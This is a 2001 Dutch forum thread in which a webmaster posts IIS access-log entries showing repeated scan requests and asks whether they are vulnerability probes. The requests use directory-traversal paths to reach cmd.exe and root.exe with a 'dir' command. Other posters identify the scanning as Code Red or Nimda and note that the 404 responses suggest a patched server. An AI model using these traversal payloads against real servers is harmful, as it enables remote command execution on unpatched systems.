IIS webserver attack?

Pagina: 1
Acties:
  • 101 views sinds 30-01-2008
  • Reageer

  • Flyduck
  • Registratie: Juni 2001
  • Laatst online: 28-03-2025
Ik ben in de logs van onze IIS webserver vreemde dingen tegegekomen... hier een stukje:

194.128.98.2 - - [12/Oct/2001:04:06:55 +0100] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:56 +0100] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:57 +0100] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:57 +0100] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:58 +0100] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:59 +0100] "GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:06:59 +0100] "GET /scripts/..Á../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:01 +0100] "GET /scripts/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:02 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:03 +0100] "GET /winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:03 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:04 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:04 +0100] "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396
194.128.98.2 - - [12/Oct/2001:04:07:08 +0100] "GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 3396

En dit op een aantal websites en heel frequent vanaf verschillende IP's .. Is dit een soort zoeken naar lekken in de beveiliging??

Fly

Zijn er mensen die deze regel lezen? Graag terugkoppeling gewenst (onopvallend)


  • Zwelgje
  • Registratie: November 2000
  • Laatst online: 09:02
yep

A wise man's life is based around fuck you


  • Asphyxion
  • Registratie: November 1999
  • Laatst online: 16:35

Asphyxion

I am, therefor I think


  • Flyduck
  • Registratie: Juni 2001
  • Laatst online: 28-03-2025
Op maandag 15 oktober 2001 15:34 schreef Asphyxion het volgende:
UTFS?
Zucht ;(

Zijn er mensen die deze regel lezen? Graag terugkoppeling gewenst (onopvallend)


  • jelmervos
  • Registratie: Oktober 2000
  • Niet online

jelmervos

Simple user

Mooi laten gaan, zolang jij alles maar goed dicht hebt. :)

"The shell stopped unexpectedly and Explorer.exe was restarted."


Verwijderd

Da's idd de Code Red worm die je IIS op lekken gaat testen. Maar er staat 404 achter die requests, dus root.exe (backdoor programma) is niet gevonden dus je server zal wel gepatched zijn.

  • wildhagen
  • Registratie: Juni 1999
  • Niet online

wildhagen

Blablabla

Op maandag 15 oktober 2001 15:41 schreef TheNarfstyler het volgende:
Da's idd de Code Red worm die je IIS op lekken gaat testen. Maar er staat 404 achter die requests, dus root.exe (backdoor programma) is niet gevonden dus je server zal wel gepatched zijn.
Nee, dit is niet CodeRed, die pakt default.ida. Dit is een al wat oudere exploit, waar ook allang een patch voor is. Ik weet alleen ff de naam van het ding niet meer.

Virussen? Scan ze hier!


  • Flyduck
  • Registratie: Juni 2001
  • Laatst online: 28-03-2025
Zo zie je maar weer hoe onwijs belangrijk die patches zijn :-)

Zijn er mensen die deze regel lezen? Graag terugkoppeling gewenst (onopvallend)


Verwijderd

Idd, dit is Nimda. Ik zat mis :)

  • Asphyxion
  • Registratie: November 1999
  • Laatst online: 16:35

Asphyxion

I am, therefor I think

Op maandag 15 oktober 2001 15:37 schreef Flyduck het volgende:

[..]

Zucht ;(
Zucht... ;(

  • AMDFreak
  • Registratie: Juni 2001
  • Laatst online: 16:39

AMDFreak

Intel is zo..

Op maandag 15 oktober 2001 15:47 schreef Flyduck het volgende:
Zo zie je maar weer hoe onwijs belangrijk die patches zijn :-)
Nee al het goeie komt van Dutch Power Cows :)

9x Jinko 420Wp = 3780wp - Zuid 35 | Kia EV3 GT-BusinessLine 83kWh

Pagina: 1